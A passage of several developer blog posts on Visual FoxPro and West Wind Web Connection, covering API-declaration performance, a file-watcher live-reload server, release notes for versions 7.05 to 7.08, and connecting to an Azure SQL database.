lnPointer = JsonEncodeString(lcValue,@lcOutput)
RETURN WinApi_NullString(@lcOutput)
ENDFUNC

This now takes 0.72 seconds to run. That's more than 20x the performance!

This code is not pretty and it relies on a public variable, but it's undeniably efficient.

The way this works is that a public boolean variable is created. Initially this value is .F. because FoxPro variables declared or otherwise by default are always .F. when undefined. So the code checks for that and if .F. declares the API and also sets the PUBLIC variable to .T.. Next time through now the value of the public var is .T. and so the declare doesn't fire again. It's a little trick to have a 'singleton' code path at the expense of an extra PUBLIC variable.

Apply to Blocks of Declarations

You can apply the same technique to a larger set of API declarations that you might make in Init() or DeclareApis() type call. For example in wwAPI's init method I do the following now:

PUBLIC __wwApiDeclatationsAPI
IF !__wwApiDeclatationsAPI
	DECLARE INTEGER GetPrivateProfileString ;
	   IN WIN32API ;
	   STRING cSection,;
	   STRING cEntry,;
	   STRING cDefault,;
	   STRING @cRetVal,;
	   INTEGER nSize,;
	   STRING cFileName
	DECLARE INTEGER GetPrivateProfileSectionNames ;
	   IN WIN32API ;
	   STRING @lpzReturnBuffer,;
	   INTEGER nSize,;
	   STRING lpFileName 

	DECLARE INTEGER WritePrivateProfileString ;
	      IN WIN32API ;
	      STRING cSection,STRING cEntry,STRING cValue,;
	      STRING cFileName     

	DECLARE INTEGER GetCurrentThread ;
	   IN WIN32API 
	   
	DECLARE INTEGER GetThreadPriority ;
	   IN WIN32API ;
	   INTEGER tnThreadHandle

	DECLARE INTEGER SetThreadPriority ;
	   IN WIN32API ;
	   INTEGER tnThreadHandle,;
	   INTEGER tnPriority

	*** Open Registry Key
	DECLARE INTEGER RegOpenKey ;
	        IN Win32API ;
	        INTEGER nHKey,;
	        STRING cSubKey,;
	        INTEGER @nHandle

	*** Create a new Key
	DECLARE Integer RegCreateKey ;
	        IN Win32API ;
	        INTEGER nHKey,;
	        STRING cSubKey,;
	        INTEGER @nHandle

	*** Close an open Key
	DECLARE Integer RegCloseKey ;
	        IN Win32API ;
	        INTEGER nHKey
	  
	DECLARE INTEGER CoCreateGuid ;
	  IN Ole32.dll ;
	  STRING @lcGUIDStruc
	  
	DECLARE INTEGER StringFromGUID2 ;
	  IN Ole32.dll ;
	  STRING cGUIDStruc, ;
	  STRING @cGUID, ;
	  LONG nSize
	__wwApiDeclatationsAPI  = .T.
ENDIF
    
ENDFUNC
* Init

which loads all those API declarations only once.

This is a neat trick that I've applied to a few key APIs that are in heavy use in Web Connection recently to see a nice speed bump for a few common operations for the trade off of a few extra PUBLIC boolean variables bumping around in memory which is a small price to pay for the slight performance gain.

Caveat: CLEAR DLLS can break this!

Both of these approaches - per declaration or per block - do come with a Caveat: It is possible for some other code to do CLEAR DLLS and that will break subsequent API calls because the DLLS unload but the variable stays set.

Not for Every API Call

To be clear you don't need to do this for every API call. There's no need to do this say for this API call:

FUNCTION WinApi_Sleep(lnMilliSecs, llWithDoEvents)
LOCAL lnX, lnBlocks

lnMillisecs=IIF(type("lnMillisecs")="N",lnMillisecs,0)

DECLARE Sleep ;
  IN WIN32API ;
  INTEGER nMillisecs

IF !llWithDoEvents OR lnMillisecs < 200   
   Sleep(lnMilliSecs)    
   RETURN
ENDIF

*** Create 100ms DOEVENTS loop to keep UI active
lnBlocks = lnMilliSecs / 100
FOR lnX = 1 TO lnBlocks - 1 
   Sleep(100)
   DOEVENTS
ENDFOR

ENDFUNC

Watch for pre-mature Optimization

This is obviously an operation that's meant to be slow so need to speed it up. It also isn't necessary for UI related tasks, or basically anything that needs to be called only occasionally. It's only for things that are used on the critical path and especially operations that might occur in a tight loop or many times.

The previous examples of JsonString is a good example - that method is called quite frequently when serializing objects. An array or collection may have hundreds of objects when many string properties for example and there it makes a big difference.

Likewise in Web Connection there's a UrlDecode() function that calls into wwIPStuff.dll to decode larger strings. For large input forms in a Web application that method may be called 100 times successively and again that does end up making a difference.

So choose wisely.

Summary

API calls are one of the earliest Interop features in the FoxPro language and they provide a powerful and potentially fast interface to external functionality in Win32 DLL code.

Just remember that Declaring your API may have significantly more overhead than actually calling it so for critical path operations either declare the API up front or use the gate-keeper trick I showed above to bracket the code and load the declarations only once for the lifetime of the application.

Building a Web Connection Live Reload Server

$
0
0

Look 'ma - no hands

Look Ma! No hands... I love shaving off time in my development cycle. A lot of what we do during Web Development is highly repetitive and by removing some of the steps in the typical process even making small adjustments that save time, can end up saving a lot of time over the course of a day, and especially over the lifetime of a project. This post is about saving time in build, debug, run cycle.

A few months ago I wrote about how you can use Browser-Sync with Web Connection to automatically reload your browser when you make changes to HTML and other Web related resources in your projects. The idea is that you run a command line utility that acts as a Web Request proxy that detects changes on disk, and when it finds a change it automatically causes the browser to reload. It's incredibly useful and productive to work that way as you can make changes and you can literally see the changes you make in-real time changing as soon as you save to disk - the browser automatically refreshes the page you are already on without having to manually reload.

One thing that has been missing though is the ability to also detect server side code changes and automatically refresh the Web Connection server.

Consider the current scenario when you make a change to server side Web Connection Code:

  • I start my Web Connection Server
  • I find a problem with my Code
  • I stop the server
  • From the Command Window open the editor
  • I find the code with the problem
  • I make the change and save
  • I start the server back up from the Command Window
  • I refresh my Web page

That's a lot of steps - and I know I go through those steps quite a bit. Note that this applies both to HTML code, and API implementations. With APIs browser refresh isn't an issue but restarting the server very much is the same for API's as it's for HTML based Web UIs.

Now imagine that you can edit your code and don't to stop the Web Connection Server manually, nor restart it. That's what I'll talk about in this post.

Using what I'll describe here we'll be able to cut the steps above down to:

  • I start my Web Connection Server
  • I open my open editor (still in context usually)
  • I make a change and save
  • If BrowserSync is also running, active page auto-refreshes

This may not seem like a lot of saved steps, but it takes out the most time consuming ones which is stopping the server, typing the file to edit and then afterwards starting the server back up again. It easily shaves a 20-30 seconds of the debug/run cycle which is significant.

Here's what both Live Reload and Browser Sync look like when used in combination:

Notice that at no point in this demo do I restart or refresh either the Web Connection server or the Web Page - the changes happen as soon as I save my changes to disk.

Best with DebugMode off

Note that for best results it's also best that you run the server with DebugMode off. With DebugMode off errors are handled by Web Connection and display an error page, rather than breaking which interrupts the flow shown above.

With errors not breaking and displaying a message instead, you can use the error message to figure out where to make a change, change te code and simply save, and the server is right back up and running. Additionally if you use an external editor like VS Code you can just leave your code editor open and stay in context - unlike the FoxPro editor that locks source PRG files.

Watching Server Side Files

The idea is that it's possible to set up a file watcher and watch for changes on disk. When a code file is changed the watcher tells the Web Connection app to shut down and restart itself. If SET DEVELOPMENT ON is set, the file change is automatically detected by FoxPro and the file is automatically recompiled when it gets loaded again.

Optionally if you prefer to work with compiling your project into EXE after changes instead of starting the PRG file (as I like to do during dev time), you can also change the default logic to rebuild your project's EXE as part of the restart process. I'll show how to do that later.

Note that this works especially very well if you use an external editor like VS Code with the FoxPro language extension.

You can also use the FoxPro editor as long as you turn off automatic compilation on Save. Why? Because you'll be editing live code that is actually still running while you're editing. If the code were to compile it would fail to do so because the .FXP file or class will be in use by the running instance. So if you want to use this feature with the FoxPro editor make sure to turn off the Compile on Save option.

How do I set this up?

The way this is implemented is via new helper function that sets up a .NET File Watcher that watches for file changes. When a source code file is changed or added, the helper unloads the running, file based Web Connection server and restarts it. It also creates a small temporary file that force browser-sync - if it's running - to refresh the active Web page.

So let's look to see what this looks like using Web Connection 7.05 and later. Starting with that version the templates automatically include the required logic to hook up the Live Reload Functionality via a custom LiveReloadServer=On configuration setting.

If you're creating a new project with Web Connection 7.05 and later, the following code is auto-generated into the source code, so you don't need to add anything. If you have an older application and are updating to 7.05 or later you can use the following to add this functionality to an existing application.

All the code hookups are done in your mainline program (AppMain.prg) in the file based start code block.

There are two parts to this process:

  • Hook up the file watcher
  • Handle the shutdown and restart process

The first bit is setting up the file watcher implementation which lives in a new file in LiveReloadServer.prg. This class uses wwDotnetBridge to create a file watcher, and an event handler that can capture the file change events that are fired from that component.

To hook up this component is done after the Web Connection server is initially created and it's very simple:

*** Load the server - wc3DemoServer class below
goWCServer = CREATE("WwthreadsServer")

*** Live Reload Server if program files are changed on disk (File Watcher)  
IF goWCServer.oConfig.lLiveReloadServer AND Application.StartMode = 0
   DO LiveReloadServer
ENDIF

The LiveReloadServer.prg function that sets up the watcher is loaded only when running in the IDE only if the LiveReloadServer flag is set in the server configuration. Once this is done the File Watcher now watches all source code files and when any .prg, .vcx, .app, .exe or .ini file (by default) is changed the watcher triggers code that causes the READ EVENTS loop that keeps the server alive to be terminated causing the application to shut down. A lAutoReload flag is also set on the server, and if the application is shutting down in restart mode additional code is run to restart the server.

*** Make the server live - Show puts the server online and in polling mode
READ EVENTS

*** Check if server wants to auto-restart - store to var so we can release
LOCAL llAutoRestart
llAutoRestart = goWcServer.lAutoRestart

ON ERROR

...

*** Release all but the variable
RELEASE ALL EXCEPT llAutoRestart
CLOSE DATA

IF llAutoRestart
   IF VARTYPE("__WWC_FILEWATCHER") = "O"
      __WWC_FILEWATCHER.Destroy()
      __WWC_FILEWATCHER = null
   ENDIF 
   CLEAR ALL   

    *** Try to restart this applications
   KEYBOARD [CLEAR PROGRAM{ENTER}] + ;
            [DO wwThreadsMain.prg{ENTER}]                
   
   *** If BrowserSync is running this will refresh the active page
   STRTOFILE(TRANSFORM(DateTime()),"..\Web\__CodeUpdated.html")            
ELSE
   CLEAR ALL      
ENDIF

Shutting down a Web Connection application and restarting is trick because you want to shut down but yet maintain some state. But it's also important to ensure that the application is completely shut down before restarting, so that the code will recompile. In order for this to work some trickery with the KEYBOARD command is used to actually type commands into the Command Window after the app shuts down to restart it. CLEAR PROGRAM is important to ensure that all classes get unloaded properly - without there are problems with the code not recompiling. Finally the code also writes a temporary file into the Web folder to trigger Browser Sync to refresh the current page.

The first part shows Server Live reload where I'm making a change inside of PRG Progress class. All I do here is save and the text is updated (small-> MASSIVE - smallish). Then when I switch to the new message I add a bit of text (the <h2> tag) to a script page. I simply save and the change is immediately shown.

There's no manual switching the changes just show immediately. Cool, right?

Although this may not seem so amazing to look at, it saves a ton of time during the development process as you don't have to keep switching between windows to start and stop the server and constantly refresh the browser.

How does it work?

As mentioned the key feature that makes the server reload work is based on using a file watcher. Where browser-sync is a separate application that handle the Web files, the Server live reload needs to be handled at the FoxPro Web Connection level. That's because although we can set up browser sync to detect changes in PRG/VCX etc. files we can't easily make it send a message back to FoxPro.

So instead using a .NET Filewatcher allows doing that by running the File Watcher in the background while the Web Connection application is running.

The first step is loading the file watcher and hooking up an 'event handler' that will receives any of the events that the object publishes and creating a subscription using wwDotnetBridge:

************************************************************************
*  LiveReloadServer
****************************************
***  Function: Optional Live Reload Module that monitors changes 
***            to code files and if changed automatically reloads
***            the main program file
***    Assume: Called from Web Connectino File based startup
***            if debug mode and 
***      Pass: lcFileList:  Optional - List of file extenions("*.prg,*.vcx,*.exe,*.ini")
***            lcFolder:    Optional - root folder
************************************************************************
LPARAMETERS lcFileList, lcFolder
LOCAL loBridge as wwDotNetBridge, loEventHandler as FileWatcherEventHandler, loSubscription

IF EMPTY(lcFolder)
   lcFolder = SYS(5) + CurDir()
ENDIF

*** Files that have changed 
IF EMPTY(lcFileList)
   lcFileList = "*.prg,*.vcx,*.exe,*.app,*.ini"
ENDIF

do wwDotNetBridge
loBridge = GetwwDotnetBridge()

PUBLIC __WWC_FILEWATCHER

__WWC_FILEWATCHER = loBridge.CreateInstance("System.IO.FileSystemWatcher",lcFolder)
__WWC_FILEWATCHER.EnableRaisingEvents = .T.
__WWC_FILEWATCHER.IncludeSubDirectories = .T.

loEventHandler = CREATEOBJECT("FileWatcherEventHandler")
loEventHandler.cFileList = lcFileList

loSubscription = loBridge.SubscribeToEvents(__WWC_FILEWATCHER, loEventHandler)
loEventHandler.oSubscription = loSubscription

RETURN

The actual event handler object is implemented then to implement each of the events that the FileWatcher publishes. The class also includes a helper that filters the incoming change requests based on just the files that we care about - *.prg,*.vcx,*.app,*.exe,*.ini. If any of those files are change then and only then do we want to restart hte Web Connection server.

*************************************************************
DEFINE CLASS FileWatcherEventHandler AS Custom
*************************************************************
*: Author: Rick Strahl
*:         (c) West Wind Technologies, 2019
*:Contact: http://www.west-wind.com
*:Created: 05/04/2019
*************************************************************

cFileList = "*.prg,*.vcx,*.exe,*.app,*.ini"
oSubscription = null
nLastAccess = 0

FUNCTION OnCreated(sender,ev)

IF THIS.HasFileChanged(ev.FullPath)
	THIS.RestartWebConnection()
ENDIF
	
ENDFUNC

FUNCTION OnChanged(sender,ev)

IF THIS.HasFileChanged(ev.FullPath)
	THIS.RestartWebConnection()
ENDIF

ENDFUNC

FUNCTION OnDeleted(sender, ev)

IF THIS.HasFileChanged(ev.FullPath)
	THIS.RestartWebConnection()
ENDIF
ENDFUNC

FUNCTION OnRenamed(sender, ev)

IF THIS.HasFileChanged(ev.FullPath)
	THIS.RestartWebConnection()
ENDIF

ENDFUNC


ENDDEFINE

The actual events that are handled have the same implementation for each one - checking whether files have change and if so restarting the server. These two functions are the key and they are both pretty simple:

************************************************************************
*  HasFileChanged
****************************************
FUNCTION HasFileChanged(lcFilename as String)
LOCAL lcFileList, lnX, lnFiles
LOCAL ARRAY laExtensions[1]

IF SECONDS() - this.nLastAccess < 5
   RETURN .F.
ENDIF   
this.nLastAccess = SECONDS()

IF ATC("\temp\",lcFileName) > 0
   RETURN .F.
ENDIF

lcFileList = STRTRAN(THIS.cFileList,"*.","")
lnFiles =  ALINES(laExtensions,lcFileList,1 + 4,",")

lcExtension = LOWER(JUSTEXT(lcFilename))
FOR lnX = 1 TO lnFiles
    IF lcExtension == LOWER(laExTensions[lnX])
       RETURN .T.
    ENDIF
ENDFOR

RETURN .F.
ENDFUNC
*   HasFileChanged

************************************************************************
*  RestartWebConnection
****************************************
FUNCTION RestartWebConnection()

*** Force file based server to shut down and then restart
IF VARTYPE(goWcServer) = "O"
	goWcServer.lAutoRestart = .t.
	CLEAR EVENTS
ENDIF

ENDFUNC
* RestartWebConnection

HasFileChanged checks to see whether the file falls in the scope of what we're looking for. It looks for the required file extensions and excludes anything from the \temp folder (which unfortunately is part of the folder hierarchy).

File Watchers have no comprehensive filter functionality (only a single Filter can be applied ) so every file change is fired into the event handler. This includes all of the message files that are created in file based messaging. HasFileChanged() makes sure that we only get notified on code files.

RestartWebConnection() then is responsible for restarting Web Connection and it only does two things:

  • It sets the lAutoRestart property on the server
  • It clears the READ EVENTS loop that shuts down the server

It's basically a trigger routine. The lAutoStart property is checked by the mainline following the READ EVENTS and then determines whether the restart code is fired. You can look back on the earlier snippets to see this implemented.

What's really cool about this is that this is a pretty simple implementation with very little code albeit with a few FoxPro specific hacks required to work around the fact that it's hard to shut down a running FoxPro program completely to ensure that everything gets completely unloaded before restarting the application.

Time Saver!

I've been using this functionality for the last few weeks working on a client application and it's been a huge time saver.

I run my application with DebugMode off most of the time now, so rather than letting my application crash on errors I rely on the error display to tell me when and where an error occurs. I then open the file(s) in question make the change and save, and the app automatically reloads. It makes for very fast iteration and it's beautiful!

If you haven't previously checked out browser-sync that's a great place to start. And Live Reload is coming in 7.05 which should be available shortly.

Check it out!

Resources

this post created and published with Markdown Monster

Web Connection 7.05 Release Notes

$
0
0

Web Connection 7.05 is here! This release is primarily a maintenance release that has a few small fixes and a few performance enhancements. But there are also a number of pretty cool new features that I'm pretty excited about.

A new Launcher for new Projects

This may not sound that exciting, but for new users the new Launch.prg that gets generated into any new project should make it much easier to launch your applications, especially if you chose to use a Web Server that doesn't automatically start like IIS Express or Browser Sync.

Web Connection 7.0 started shipping with a Launch.prg and the docs have been updated to use DO Launch in order to start your application instead of DO YourAppMain.prg. The latter still works but Launch.prg does a number of other things on your behalf:

  • Sets the Environment to add required paths
  • Launches an external Web Server if required (IIS Express, Browser Sync)
  • Launches your application: DO YourAppMain.prg
  • Launches a browser and opens the appropriate URL

Launch.prg is generated when a new project is created and so it includes all the required path dependencies and it knows whether you chose IIS or IIS Express during setup so that DO Launch just works and does the right thing. So if you chose IIS Express during configuration for your new project, Launch will automatically start IIS Express, and open the IIS Express specific URL (which is different than the IIS URL).

But you're not limited to that. Launch.prg can launch your applications for various supported modes including IIS, IIS Express and Browser Sync or by simply launching your FoxPro server.

In 7.0 Web Connection also shipped a separate BrowserSync.prg file to integrate with the great BrowserSync utility. BrowserSync is a NodeJs based utility that you can install that allows you automatically detect file system changes for specific files and if changes are detected automatically refreshes the browser. It's great for refreshing Web pages, CSS, HTML, JavaScript and immediately see you changes reflected in the browser without manually reloading the page in the Browser. It's highly productive for an interactive workflow and can really speed up the client side development cycle when changing layout, writing JavaScript code or tweaking CSS.

You can find out more about browser Sync in the docs and in this blog post.

In 7.05 the BrowserSync functionality has been rolled into Launch.prg which now supports a number of different explicit operational modes:

  • DO LAUNCH WITH “IIS”
  • DO LAUNCH WITH “IISEXPRESS”
  • DO LAUNCH WITH “BROWSERSYNC”
  • DO LAUNCH WITH “BROWSERSYNCIISEXPRESS”
  • DO LAUNCH WITH “NONE”&& or "SERVER"

Each mode has specific operations it performs and launches the appropriate operations. Note that the last option using "NONE" or "SERVER" simply launches the Web Connection FoxPro server. The advantage of using the Launch syntax over direct launch is that it also sets up the environment.

Launch.prg is just a short FoxPro program and because it's code you can customize it. Want to add additional paths during startup? Start up another application in the background? You can do that. It gives you an extra level of control.

For new developers getting started having a single PRG that does everything to start the server will reduce friction. But for old hands it's also useful because it also makes it very easy to switch between modes - I can easily switch back and forth between running on IIS, IIS Express or using Browser Sync.

Launch.prg gets generated with new projects, but if you have an existing project and you want to take advantage of this you can do that pretty easily simply createing a new project, copying Launch.prg into your existing project and then making a few small changes to the files startup header that parameterizes the script.

To find out more check out the Launch.prg documentation.

Live Reload Server

Browser Sync is a huge help in speeding up the client side development cycle. In 7.05 Web Connection now also adds a Live Reload feature for server side code. By running a file watcher as part of the Web COnnection server optionally, Web Connection can now monitor for code file changes and if it detects one, automatically restart your FoxPro server.

The current scenario for this involves a lot of steps:

  • Run your program
  • Find a bug
  • Program Stops and you edit the code
  • Save the code
  • Close everything (CLOSE ALL, CLEAR ALL etc.)
  • Start the Web Connection Server again
  • Refresh your browser

Using the LiveReloadServer configuration switch in yourApp.ini you can put the server into LiveReload mode after which you can make a code change and immediately and automatically get your server restarted. Which reduces the steps to:

  • Run your code
  • See an error message
  • Use an external editor to fix the code
  • Save your code
  • Web Connection Restarts, and Browser AutoRefreshes (if using Browser Sync)

In order for this to work a couple of things should be in place:

  • Best to run with DebugMode OFF
  • Must edit code with an external editor (VS Code or another instance of FoxPro)
  • If you use the FoxPro editor make sure auto-compilation is off
  • Best when run in combination with Browser Sync

Here's what this looks like:

Note I'm using Visual Studio Code for my editing in this example, but you can really use any editor including the FoxPro editor for Fox code editor.

The combination of both BrowserSync and the Live Reload for the server can basically automate the entire run/debug/edit/restart cycle and reduce it down to basically just using your editor to make a change and save.

I'm really excited about this especially in combination with Launch.prg because it's now trivial to switch into BrowserSync mode.

For more detail check out the documentation and this blog post.

wwHttp Improvements

wwHttp now has support for downloading string results that are greater than 16megs. As you know FoxPro has a 16 meg string size limit, but there are some ways around the 16 meg limit if you are careful what you do with your strings. Well, wwHttp now is careful and you can return larger strings. Now you have to be careful what you do with the returned string ??

Note that I think if you are expecting to receive something that large, that you should probably stream that data directly into a file and not into a string which is a feature that's always been available in HttpGet() and now also in all the new Verb related functions( Get(), Post(),Put(), Delete()).

If you are downloading you'll also be happy to find that you can now adjust the buffersize used to capture each download frame that determines how much data is grabbed at a time for the file download. Previously the buffer was capped at 24k which is pretty small when you're downloading a 16 meg file. You can now use the nHttpWorkBuffersize to set a larger buffer. The default has been bumped up to 64k which makes large file downloads go much faster. The default buffer size is also automatically adjusted to the size of the output. The value provided is a max value, so if the content is small the buffer is sized only to the size of the small buffer. This reduces memory overhead as well. For large downloads you might want to bump the buffer up to 128k or even 256k or so to really make it go fast.

A few Odds and Ends

There's a new option on the Markdown parser that optionally disables HTML support when parsing Markdown. This means that HTML inside of the Markdown is treated as plain text, rather than evaluating the HTML (which is valid Markdown). On many sites you don't want to allow users to input HTML, but you might still want to take advantage of Markdown otherwise and this options makes that possible.

The WebLog sample has been updated with a number of tweaks. In 7.0 the sample was switched to the MVC framework from the previous Web Control Framework so it's now more in line with the general recommendations for Web COnnection development. Additionally the comment system has been re-written and there are now options to remove comments directly in the message list.

Summary

There are a number of additional small fixes and performance improvements in this release too insignificant to enumerate here. This release has no breaking changes but as always you should update all your application dlls to the latest versions in your project folder and in the Web Site's bin folder.

Other than that this release is

this post created and published with Markdown Monster

Web Connection 7.06 Release Notes

$
0
0

Time for another Web Connection update this time for version 7.06. This is above all maintenance release that fixes a few small bugs that made it into the original 7.05 release - those bugs were fixed immediately and updated at the time, but just to make sure there's a consistent release that includes all the bug fixes plus a few additional ones.

In addition there are a couple of major enhancements:

  • New and Improved Live Reload Functionality
  • Updated Launcher with Launch.prg

You can download the latest version from:

New Live Reload Functionality

Live Reload is a productivity feature for development that can automatically refresh your browser and restart your FoxPro server (if needed) when you change code or markup logic in your application at development time.

What is Live Reload?

Live Reload watches any files in your code and web folders and when it finds changes can automatically refresh the current page in the browser. On the server Web Connection can automatically restart the Web Connection server, so you can make a change at any time and immediately see that change reflected in the browser without having to explicitly shut down and restart your server, and refresh the browser. It's a huge productivity enhancer plus it allows for much better visualization of the code - especially UI code - that you are working on.

Here's what this feature looks like in action:

It's not 100% clear in the video, but all I'm doing is changing code and markup. I'm not stopping the Web Connection server or refreshing the browser manually - the refreshes and restarts happen completely automatically.

Live Reload and Web Connection

Live Reload functionality was introduced in Web Connection 7.05 with the help of a third party tool called Browser Sync to provide the browser refresh functionality. In version 7.06 we've pulled the core functionality directly into Web Connection so you no longer need to use BrowserSync - the Live Reload functionality now lives natively in the Web Connection .NET Module via built-in WebSocket support. The new implementation is much faster since the changes are detected directly at the source and refreshed without any delay.

Inside of the .NET Module Web Connection injects a bit of script code that lets the server communicate with the browser to force a page refresh into any HTML content rendered both for script mapped pages directly mapped to Web Connection as well as static HTML pages.

Enabling Live Reload in 7.06+

Live Reload is disabled by default, because it adds some request overhead and requires that ALL requests including static files are routed through the Web Connection module. This is totally fine during development, but at runtime you wouldn't want this behavior. The functionality is also not useful at runtime.

So this feature needs to be explicitly activated.

In web.config:

  • Set LiveReloadEnabled configuration to True
  • Enable runAllManagedModulesForAllRequests
  • Uncomment Web Connection Live Reload Module hookup

In yourApp.ini:

  • Set LiveReloadEnabled to On

You can find out more detail on how to enable Live Reload in the documentation.

Support for Old Projects

The necessary server reload logic gets embedded in new projects via the New Project Wizard. This code can easily be adapted however and added to existing projects.

For more information how to add the server recycling code into your existing main program files of older applications, please check out the details in the Help Topic.

Update your WebConnectionModule.dll

The new Live Reload Features are built into Web\Bin\WebConnectionModule.dll Web Connection .NET Handler, and you will need to update that file in your Web projects for Live Reload to work. Make sure your Web Connection Module Administration page shows version 7.06 or later.

You will also need to add Microsoft.WebSockets.dll which provides the Web Socket functionality used for the in-browser communication.

Finally Live Reload requires WebSocket support and it's supported only on Windows 10 & 8.1 and Server 2012R2 and later.

Updated Launch.prg

In version 7.05 Web Connection also introduced a new launcher for new projects. Launcher.prg can be used as a wrapper around your main program to launch your application, start the Web Server (in the case of IIS Express), open a browser window and also handle configuration on your startup environment.

The reason we added this was to automate some of the manual steps you have to go through to launch a Web Connection project for the first time to make it easier for new users to get started. In addition to launching, the launcher also prints some status information of what it's running to the Desktop to make it clearer to new users what actually is going on (you can see that text behind the main window in the video).

Today when you create a new project Web Connection generates a custom Launch.prg for a project and then starts it when automatically with do launch for the Web server you chose.

To use this feature you can simply do:

*** Default Launch for Server type Generated
DO LAUNCH

*** Launch IIS Express explicitly
Launch("IISEXPRESS")

*** Launch IIS explicitly
Launch("IIS")

*** Launch without starting the server and no browser opened
Launch("SERVER")

The first options are self-explanatory. The last one is similar to doing DO YourAppMain.prg, but it also fires the environment set up code to change path, set paths to Web Connection libs etc.

Make it Your's

Launch.prg is a ‘script’ - it's generated with a new project specifically for the project which means you can make changes to it. If your environment requires additional settings - drive mappings, extra paths, making sure that other EXEs are running etc. - you can add that to your copy of Launch.prg.

Creating Launch.prg for an Old Project

By default Launch.prg is generated for new projects. But if you have an existing project you can easily create a new Launch.prg file by copying one from a new or existing project. All the configuration settings that change are defined at the top of the file so you can just change the relevant settings.

For example the following are for the TestProject I used in the Video above:

*** Generated Defaults
lcVirtual = "TestProject"
lcAppName = "Testproject"
lcScriptMap = "tp"
lcWcPath = ADDBS("C:\WCONNECT\FOX\")
lcWebPath = LOWER(FULLPATH("..\web"))
lcIisDomain = "localhost"     && test.west-wind.com
llIisExpress = .F.

Version 7.06 Summary

There you have it: Web Connection 7.06 is a relatively small update. The main reason we pushed this out so quickly after 7.05 is to get the Live Reload and Launch features out as quickly as possible before adoption of the features introduced in 7.05 get into too many setups. Although this version makes a change to those older settings the changes are very minor. It's better to do it now while those changes are fresh in everybody's mind.

Resources

Using FoxPro to Connect to an Azure SQL Database

$
0
0

Several times now people have asked me whether you can use FoxPro's SQL Server features, and the wwSQL class in particular to connect to a remote Azure SQL database. The answer is a hearty yes, of course.

But there are a few things you have to consider when using Azure in general and connecting to an Azure SQL database remotely.

Azure Databases

Azure SQL databases are basically SQL Server databases. Azure SQL is 95+% compatible with SQL Server and you use the same SQL Server drivers that you use to connect to a local or locally networked SQL Server database.

In order to access an Azure SQL database remotely you have to configure a couple of things:

  • Enable the Firewall for your IP Address
  • Pick up a valid Connection String

In the portal you can find those two options here:

Picking up a Connection String

Connecting to a SQL Azure database is the same as any other database - you can use a connection string to connect to it. If you're using raw FoxPro you can use SQLSTRINGCONNECT() or if you're using the wwSQL class you can use the Connect() method with the connectionstring as a parameter.

There are several connection strings but the closest one you can find is the ODBC driver one:

You need to specify your username and password that is setup for the database and embed those into the connection string provided.

The username is typicaly the name of the database. The password is a one time password and can only be looked up by resetting the password in the portal which is because of security - Azure never echos back the password to you other than when it's created. This is a pain, but it's a good security practice.

Retrieving or Resetting the Password

To reset the password:

  • Click on the Server Name (mydb.database.windows.net)
  • Then click on Reset Password

Basically this is the equivalent of resetting the admin password on the server and the only way that password can be redisplayed on the portal is by resetting it.

Once you've reset the password it's displayed and you can save it and use it in your connection string. I recommend you save it somewhere, or if you have an Azure Web application that uses it, immediately apply it to that application's configuration values.

Allowing IP Address Access

The connection string alone is not enough and you need to enable access for the specific IP Address that you're using to access the database.

Because Azure is a remote database, there are serious security concerns over who can access the database, so Azure SQL (and most other data services on Azure) requires you to provide a white list of IP addresses:

You have to explicitly enable access for all IP addresses that need to access the server.

You can do this in the portal by specifying any number of IP addresses here:

As you can see you can specify a begin and end IP Address which is a range and each user or server requires a configuration (if they are not in the same location). For example, in this database Markus Egger and I work on this application and we both have multiple locations we're accessing the application from.

Note that the Azure server locations if you are using an Azure Web application to connect, are automatically included so you don't have to explicitly enable those.

For a single IP use the same IP for both start and end ips. I tend to use the full range of the subnet just because an ISP often will change your IP Address when your address' lease expires.

If you forget to set the IP Address access the remote IP Address will not be exposed, and a connection attempt will hang typically for the timeout of the connection.

SQL Server ODBC Driver

You also need to make sure that the machine you're using has a SQL Server ODBC driver installed. The ODBC connection string provided by Azure will automatically include a very specific ODBC driver, along with a link where you can download it.

Personally I prefer to leave off the driver and use whatever is installed locally which is the default FoxPro SQL driver. You may need a newer explicit driver if you use some of the newer SQL Server data types and features, but for most applications the old drivers are just fine.

Connecting

Once you have a connection string, ODBC driver and the IP Address configured you're ready to connect finally.

Pick up the ODBC connection string from the Azure portal and then add in your username and password. Remember by default the username is the name of the database, and password is the server's admin password.

Here's what this looks like using wwSQL:

CLEAR
lcConn = "Server=tcp:mydb.database.windows.net,1433;" +;"Database=kavadocs;" +;"uid=mydb;pwd=ultraSeekritPassword;" +;"MultipleActiveResultSets=yes;Encrypt=yes;" +;"Connection Timeout=30"
DO wwSQL
loSql = CREATEOBJECT("wwSql")
? loSql.Connect(lcConn)
? loSql.cErrorMsg

? loSql.Execute("select * from Users")
? loSql.cErrorMsg
BROWSE NOWAIT

And that lets me access the remote database. Note I removed the specific driver from the connection string. You can leave that in, just remember that if you do that driver has to be installed everywhere you run the application, whereas the code above will work with whatever driver is installed. Note that some SQL SERVER ODBC driver has to be installed in order for this to work, so your application's installer probably needs to ensure it installs the appropriate ODBC driver.

The code above uses wwSQL - for plain FoxPro replace the .Connect() call with SQLSTRINGCONNECT() and then capture the connection handle to run your SQLEXEC() commands.

Summary

Azure is getting popular for hosting data stores, and SQL Azure is an easy way to host a SQL Server that is compatible with traditional SQL Server applications in the cloud. Azure isn't cheap especially if you need higher performance or lots of storage, but it does provide a nice admin-less service in the cloud that's easy to set up and manage remotely with very little effort.

Remote connections is not something you should use as part of an application - performance generally is not great over the Internet, but in a bind it's totally possible to remotely connect and access the database remotely. The most common scenario is for development and testing while the deployed Web application actually runs on Azure proper.

I hope this brief post gives you all the information you need to use Azure SQL databases in your FoxPro applications remotely.

this post created and published with Markdown Monster

West Wind Web Connection 7.08 Release Notes

$
0
0

Web Connection 7.08 is out and this release, as the last one, is mostly a maintenance release that fixes a few small bugs and provides some minor behind the scenes tweaks to existing functionality.

The theme of this release has been a focus on the development time experience and the changes in this update continue along these lines with additional improvements to the new Launcher.prg and the Live Reload Functionality.

Live Reload Enhancements

If you missed it, starting in v7.05 Web Connection started providing support for live reloading of content when you make a change to either client side HTML/CSS/JS, a server side template or script or even your process class code. Live Reload when enabled detects that a change was made to a file of interest and then automatically refreshes the current page in the active Web browser. This technology works through the magic of WebSockets which allow the Web Connection Server Module to communicate with script code running inside of the browser to refresh the page.

Live Reload is an immense time saver as you can work on your code and as you make changes have update the live browser with rendered output. If you can run side by side with your Editor or IDE or on another monitor, and you can immediately and in real time see these changes reflected on the page your browser is currently on. Any change triggers an update to the browser.

If you've never used this way of working before, especially for your HTML/CSS and template code, it's hard to describe how much of a productivity boost this provides.

To give you an idea how this works here is a short screen capture that highlights the features:

